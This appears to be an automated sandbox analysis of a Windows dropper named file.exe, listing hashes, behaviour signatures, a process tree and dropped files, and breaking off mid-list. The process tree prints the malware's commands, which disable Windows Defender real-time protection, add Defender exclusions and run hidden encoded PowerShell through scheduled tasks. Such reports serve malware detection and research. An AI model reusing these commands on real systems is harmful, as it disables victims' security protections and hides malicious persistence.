Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
29-10-2022 04:54
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
17627a28ac39f502939924cde571351a
-
SHA1
3225de95a8baefa935ccab9bb3c2bc86aa0fc91a
-
SHA256
600be49704a6a83d3947f6f5e90be6054b3c61d80b411de040d78fa24218b0c8
-
SHA512
6bcb6b7cc185a4e6db7f1641643e3f11c4af4e9007c096d2979c239c0c6ccbba7f5978ff65603a2e07f9dd0d7150947d2395101558093eca26b9f84a20e768c5
-
SSDEEP
196608:91Oz9zWRWy3uVYEL5AuckyFxmfRVc5Ny/w0RJqAHJ:3OAWyeVcu5yFIjcOoFAHJ
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Drops file in System32 directory 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS762A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8798.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPOeVVoVO" /SC once /ST 05:39:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPOeVVoVO"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPOeVVoVO"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhLXEjHxBtkbbNqWSu" /SC once /ST 06:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\CbpsZER.exe\" Ez /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AB181815-8F80-4EF8-AEE4-7E5BC03F781B} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {EBF9A65F-5EDC-4892-B246-9E3C13AD8D9C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\CbpsZER.exeC:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\CbpsZER.exe Ez /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gijstSalY" /SC once /ST 04:10:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gijstSalY"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gijstSalY"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWIPbZJAL" /SC once /ST 04:32:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWIPbZJAL"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWIPbZJAL"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\itLWlUfoycYRNPTF\WKHjshdp\jQFFApeYGfamHOzI.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\itLWlUfoycYRNPTF\WKHjshdp\jQFFApeYGfamHOzI.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtCSCKapluTyC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eTQrVVcbPeUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZLmQfqCTfSU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ptIyuvGcU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HlgLlrmAHxInKQVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\itLWlUfoycYRNPTF" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOflPjMcJ" /SC once /ST 05:32:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOflPjMcJ"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD54320effcd1a18aeba8f5c6cd645c8011
SHA1e7efe415efda15e4c3af10c38a93704fd3f6b3d0
SHA2568604d1467fbe625ab55fe3aefb1a5ddf46226c9114aeebd17c3cf735a13f20e2
SHA5124f9a3594b1767debf4e02100d9574a56f7944c666843bb3b18dc24715c7ddb5f02154317273ad846a370af6ef8cefee4409ce5a6624496ce652da447659dbff9
-
Filesize
6.3MB
MD54320effcd1a18aeba8f5c6cd645c8011
SHA1e7efe415efda15e4c3af10c38a93704fd3f6b3d0
SHA2568604d1467fbe625ab55fe3aefb1a5ddf46226c9114aeebd17c3cf735a13f20e2
SHA5124f9a3594b1767debf4e02100d9574a56f7944c666843bb3b18dc24715c7ddb5f02154317273ad846a370af6ef8cefee4409ce5a6624496ce652da447659dbff9
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
6.9MB
MD5e8e5c52d8aef74655e62c49813b5abd7
SHA111e9475aa55ec6f05fb7af75511ac79b99aafc05
SHA256996248b95eca4f67bc519d5087426f047f7d5d96bbf0dd2f511ea7a12affaed6
SHA5123ba666b24cdaf3cb9a2eb9b341517ef6e9d8220155e554fcac11d8227a6d8236efbd47688d4785caa78f24b2d23c74d36bc01e52cc4b7358279c71c68b49b5e7
-
Filesize
7KB
MD53c11df4822c3b567c7a744baba17b464
SHA16482b703c468ee7450f6a58ae23db420e5f4cea3
SHA256dc09bfa6795f6988f6c32909fce89f7da9cf3821bef2c8555a2929b9aa6d0666
SHA512c2df50d0fb041fd14eba39bd5da9d9cc51364ca38a20cdc5f0673eb4f6f710b522eabb1c331a0f91860d2949b4795c3494bae67b508ef080f8d99358eeb6d131
-
Filesize
7KB
MD57a79a47c72e54f6e66602a50dacdc54f
SHA14a18342c770ba5a98540d357a4e77a0d51cd814b
SHA2560816c3e3d74996468d27dc2e51cefbcc04fb66c7300e5870ce707839023e070d
SHA512f8b94be45c45630049ffa653c24475ffe0fdf7228321da0efa7b553a09ae47f52cdf609e8bb619da1b992fd56eff87d8c6636e637d563cfe6aeea5dd2896fd45
-
Filesize
7KB
MD57e0b25395712b7bbff60a324dd7a1abb
SHA1c7fc5c92cb268d3c59451fb849c6a24e11863595
SHA256ba18b0b654a3309c0582735b2240caa697b17425a605dca86eada059e1e94698
SHA512d03fbd62e4d32d1deb9f5ba12563765329547594e8602b27c1fbd374d595ac254e8f11f4f23f258177c0d58784dd928b124d775cb478b72f48697312bca1c0e5
-
Filesize
8KB
MD5f28a14faa1614bdcd52947befd38952b
SHA1d1643469d9a7f0d2c32fab113332d90dde2b8665
SHA256ff213a78f2450cf91666f355eeed112415e044428f494bdd674a7d0d9da2f63e
SHA5129d6fc5100209674528f1ca03bbdb097b79295e7f5deb53b2d94d74a87b2c6b00c1a99cd4169f1bbf4fdbac1eb39b2849473c7da35c6d6d0a3e8a63537bb5babd
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD54320effcd1a18aeba8f5c6cd645c8011
SHA1e7efe415efda15e4c3af10c38a93704fd3f6b3d0
SHA2568604d1467fbe625ab55fe3aefb1a5ddf46226c9114aeebd17c3cf735a13f20e2
SHA5124f9a3594b1767debf4e02100d9574a56f7944c666843bb3b18dc24715c7ddb5f02154317273ad846a370af6ef8cefee4409ce5a6624496ce652da447659dbff9
-
Filesize
6.3MB
MD54320effcd1a18aeba8f5c6cd645c8011
SHA1e7efe415efda15e4c3af10c38a93704fd3f6b3d0
SHA2568604d1467fbe625ab55fe3aefb1a5ddf46226c9114aeebd17c3cf735a13f20e2
SHA5124f9a3594b1767debf4e02100d9574a56f7944c666843bb3b18dc24715c7ddb5f02154317273ad846a370af6ef8cefee4409ce5a6624496ce652da447659dbff9
-
Filesize
6.3MB
MD54320effcd1a18aeba8f5c6cd645c8011
SHA1e7efe415efda15e4c3af10c38a93704fd3f6b3d0
SHA2568604d1467fbe625ab55fe3aefb1a5ddf46226c9114aeebd17c3cf735a13f20e2
SHA5124f9a3594b1767debf4e02100d9574a56f7944c666843bb3b18dc24715c7ddb5f02154317273ad846a370af6ef8cefee4409ce5a6624496ce652da447659dbff9
-
Filesize
